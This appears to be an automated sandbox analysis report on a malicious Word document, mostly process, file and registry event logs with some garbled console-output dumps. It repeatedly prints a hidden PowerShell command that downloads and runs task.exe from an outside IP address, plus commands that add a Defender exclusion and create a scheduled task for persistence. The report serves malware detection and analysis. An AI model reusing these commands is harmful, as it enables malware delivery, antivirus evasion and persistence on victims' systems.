                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k......................W.............}..v............0.................z.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.................7.....p.........7.......2.....`I4........v.....................K;.....................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............Ev.k......................W.............}..v....0.......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...h.......0...............X.x.....6.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............Ev.k.... .................W.............}..v............0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.W.............}..v............0...............X.x.....".......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............Ev.k....h.................W.............}..v............0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................q.k......x...............W.............}..v............0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............Ev.k....h.................W.............}..v............0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................q.k......x...............W.............}..v............0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............Ev.k....h.................W.............}..v............0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k...e.x.e.'. .......0...............X.x.....8.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............Ev.k......................W.............}..v....X.......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................q.k......................W.............}..v............0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............Ev.k......................W.............}..v....P.......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.E.....w................q.k......x...............W.............}..v............0.......................f.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............Ev.k....@.................W.............}..v............0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........q.k......x...............W.............}..v....P.......0...............X.x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Ev.k......................W.............}..v............0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.E.....................u..k....0.x...............W.............}..v.....H......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....I................W.............}..v.....J......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................u..k....0.x...............W.............}..v.....P......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k....HQ................W.............}..v.....Q......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.3.7.............}..v.....U......0.................x.....$.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....V................W.............}..v.....W......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................u..k....0.x...............W.............}..v.....]......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....^................W.............}..v....._......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................u..k......................W.............}..v.....e......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....f................W.............}..v.....g......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k...e.x.e.'.Hk......0.................x.....8.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....l................W.............}..v.....l......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................u..k....0.x...............W.............}..v....Hs......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....t................W.............}..v.....t......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v.....x......0.................x.....&.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k....Py................W.............}..v.....y......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................u..k....0.x...............W.............}..v............0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k....P.................W.............}..v............0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0.................x.....<.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k......................W.............}..v....H.......0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......u..k....0.x...............W.............}..v............0.................x.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k......................W.............}..v............0.................x.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....L.......................g.......................0.......#.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....L...............................................0.......#.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....L...............................................0......./.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....L...............................................0......./.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....L...............................................0.......;...............|.......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....L...............................................0.......;.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......N.......................0.......G...............".......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....L.......................o.......................0.......G.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....L...............................................0.......S.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....L...............................................0.......S.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.........e.x.e.(.P.....L...............................................0......._.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....L...............................................0......._.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....L.......................4.......................0.......k.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....L.......................P.......................0.......k.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....L...............................................0.......w.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....L...............................................0.......................l.......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....L...............................................0...............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....L...............................................0...............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....L...............................................0...............................................
                    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................h.......(.P.............................X.......................................................................
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\task.exe "C:\Users\user\AppData\Roaming\task.exe"
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess created: C:\Users\user\AppData\Roaming\task.exe C:\Users\user\AppData\Roaming\task.exe
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\task.exe "C:\Users\user\AppData\Roaming\task.exe"
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess created: C:\Users\user\AppData\Roaming\task.exe C:\Users\user\AppData\Roaming\task.exe
                    Source: C:\Users\user\AppData\Roaming\task.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\task.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD068.tmpJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: C:\Users\user\AppData\Roaming\task.exeMutant created: \Sessions\1\BaseNamedObjects\hFVAGeNDDuOIYKYzrWNabcGxrk
                    Source: C:\Users\user\AppData\Roaming\task.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                    Source: task.exeString found in binary or memory: /DriveIn;component/views/addbook.xaml
                    Source: task.exeString found in binary or memory: views/addcustomer.baml
                    Source: task.exeString found in binary or memory: views/addbook.baml
                    Source: task.exeString found in binary or memory: /DriveIn;component/views/addcustomer.xaml
                    Source: task.exeString found in binary or memory: /DriveIn;component/views/addbook.xaml
                    Source: task.exeString found in binary or memory: views/addcustomer.baml
                    Source: task.exeString found in binary or memory: views/addbook.baml
                    Source: task.exeString found in binary or memory: /DriveIn;component/views/addcustomer.xaml
                    Source: 14.0.task.exe.400000.11.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 14.0.task.exe.400000.11.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Users\user\AppData\Roaming\task.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\task.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\task.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: Binary string: :\Windows\dll\mscorlib.pdb0 source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\mscorlib.pdb, source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.drInitial sample: OLE indicators vbamacros = False

                    Data Obfuscation:

                    barindex
                    .NET source code contains potential unpackerShow sources
                    Source: task[1].exe.0.dr, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: task.exe.3.dr, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: SzfukVRF.exe.9.dr, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 9.2.task.exe.cf0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 9.0.task.exe.cf0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 14.0.task.exe.cf0000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 14.0.task.exe.cf0000.12.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 14.0.task.exe.cf0000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 14.0.task.exe.cf0000.6.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Suspicious powershell command line foundShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 9_2_00CF9347 push ds; ret
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 9_2_00CF9361 push ds; retf
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 9_2_00CF92F5 push ds; ret
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 14_2_00CF9347 push ds; ret
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 14_2_00CF9361 push ds; retf
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 14_2_00CF92F5 push ds; ret
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 14_2_00BE21C8 push esp; retn 0039h
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.88557099769
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.88557099769
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.88557099769

                    Persistence and Installation Behavior:

                    barindex
                    Tries to download and execute files (via powershell)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
